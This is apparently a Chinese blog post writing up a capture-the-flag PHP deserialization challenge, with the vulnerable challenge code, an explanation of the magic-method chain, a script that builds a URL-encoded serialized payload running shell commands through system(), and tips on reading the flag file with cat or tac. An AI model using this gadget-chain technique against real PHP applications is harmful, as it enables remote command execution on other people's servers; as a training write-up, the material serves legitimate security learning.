cs反序列化4

最新推荐文章于 2023-01-11 01:38:05 发布
最新推荐文章于 2023-01-11 01:38:05 发布
阅读量335 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113369615
版权

cs反序列化4

<?php
highlight_file(__FILE__);
error_reporting(0);
class test{
    public $peguin;
    public $source;
    public function __construct($file){
        $this->source = $file;
        echo 'welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->peguin->close();
    }
    public function __wakeup(){
        if(preg_match('/http|file|data|dict|\.\./i',$this->source)){
            echo "hacker!";
            $this->source = "index.php";
        }
    }
}
class good{
    public $joker;
    public function __call($name,$param){
        system($this->joker);
    }
}
$a = $_GET['cmd'];
unserialize($a);
?>

__call():当调用类中不存在的方法时,就会调用__call();
__wakeup():unserialize时会调用
__toString():当把一个类当作字符串处理时调用
__construct()new一个类时调用

流程

  1. 反序列化$a,调用__wakeup()
  2. source=new test类,调用__toString()
  3. __toString()会使用也给不存在的方法,于是调用__call()
  4. $joker为我们要执行的命令
<?php
highlight_file(__FILE__);
error_reporting(0);
class test{
    public $peguin;
    public $source;
   
}
class good{
    public $joker="ls ../../../../..";
   
}


$a=new test();
$a->source=new test();
$a->source->peguin=new good();

echo urlencode(serialize($a));

run:O%3A4%3A%22test%22%3A2%3A%7Bs%3A6%3A%22peguin%22%3BN%3Bs%3A6%3A%22source%22%3BO%3A4%3A%22test%22%3A2%3A%7Bs%3A6%3A%22peguin%22%3BO%3A4%3A%22good%22%3A1%3A%7Bs%3A5%3A%22joker%22%3Bs%3A17%3A%22ls+..%2F..%2F..%2F..%2F..%22%3B%7Ds%3A6%3A%22source%22%3BN%3B%7D%7D

在这里插入图片描述
怎么没有flag

$joker="ls"

在这里插入图片描述

$joker="cat flag.php"

出了个寂寞,为什么
原来在源代码里面
在这里插入图片描述

Linux读取文件的一些命令
cat  从第一行开始,显示文件的所有内容
tac  从第最后一行开始,显示文件的所有内容(正好与cat相反)
more 根据窗口大小,一页一页的实现文件内容
less 和more类似,但是优点是是可以往前翻页和搜索字符
head  只显示前几行
tail  只显示后几行
nl     类似于cat -n,显示时输出行号

这道题如果用cat就不能在页面上显示,用tac的话就可以在这里插入图片描述

切谁怕谁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
XML序列化与反序列化 实战
08-16
4. 数据持久化:对象状态可以被序列化到磁盘,当需要时再反序列化恢复。 总的来说,这个实战项目提供了XML序列化和反序列化的实用工具,帮助开发者更高效地处理XML数据和C#对象之间的转换。通过理解和使用提供的...
记一次原生类反序列化
qq_61142406的博客
05-26 109
源码: <?php highlight_file(__FILE__); class a{ public $un0; public $un1; public $un2; public $un3; public $un4; public function __destruct(){ if(!empty($this->un0) && empty($this->un2)){ $th
php反序列化pop链
yourdawntown的博客
09-04 580
成都理工平台的一道反序列化 源码如下 <?php highlight_file(__FILE__); class A { public $a; private $b; protected $c; public function __construct($a, $b, $c) { $this->a = $a; $this->b = $b; $this->c = $c; } protected function flag()
PHP反序列化漏洞解析
weixin_43749601的博客
10-31 655
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; //%00*%00属性名 protected $filename; protected $content; function __construct() { //该方法在创建对象时自动调用 $op = "1"; $filename = "/tmp/tm
php反序列化之字符逃逸
qq_53856457的博客
05-14 1619
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
1.29刷题记录
conelly的博客
01-29 813
[MRCTF2020]Ezpop Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected
C# 序列化-反序列化.cs
09-06
C# 序列化-反序列化.cs
C# 序列化与反序列化
04-15
在C#编程中,序列化和反序列化是两个关键的概念,它们主要用于数据持久化、网络传输或跨进程通信。序列化是将对象的状态转换为可存储或可传输的形式,而反序列化则是将这种形式的数据恢复为原来的对象。本主题主要...
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
05-09
综上所述,"c# CS登录实现(序列化反序列化)LoginProcessVersion1.0"项目涉及了客户端与服务器间的通信,其中序列化和反序列化是数据交换的核心技术。理解并掌握这些概念对于开发任何需要网络交互的应用都是至关...
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1604
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
ctfshow—PHP特性
cosmoslin的博客
09-14 2230
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
BMZCTF:Bestphp
末初的CSDN博客
04-25 1306
http://www.bmzclub.cn/challenges#Bestphp index.php <?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html:/tmp'); $file = 'function.php'; $func = isset($_GET['function'])?$_GET['function']:'filte
CTFSHOW-PHP反序列化
Monica的博客
09-24 2488
WEB254 题目: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->
CTFshow刷题日记-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3322
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
[SCUCTF2022]校赛Web出题笔记
cosmoslin的博客
05-27 1971
前言 本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。 checkin <?php error_reporting(0); $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='inject'){ die('Permission denied'); } $lock = call_user_func(($_GET['Y'])); if (
kss admin index.php,XCTF Final 2018 Web Writeup (Bestphp与PUBG详解)
weixin_42303389的博客
03-11 1522
WEB1——Bestphp这道题提供index.php源码index.phphighlight_file(__FILE__);error_reporting(0);ini_set('open_basedir', '/var/www/html:/tmp');$file = 'function.php';$func = isset($_GET['function'])?$_GET['function'...
ctf刷题小结
quan9i的博客
05-15 6250
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
PHP代码审计8—SSRF 漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-02 1499
SSRF基础学习
c# protobuf序列化
最新发布
09-07
6. 如果要将字节数组反序列化回消息对象,可以使用解析器类: ```csharp Person deserializedPerson = Person.Parser.ParseFrom(data); ``` 现在,您可以使用deserializedPerson对象访问反序列化后的数据。 这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值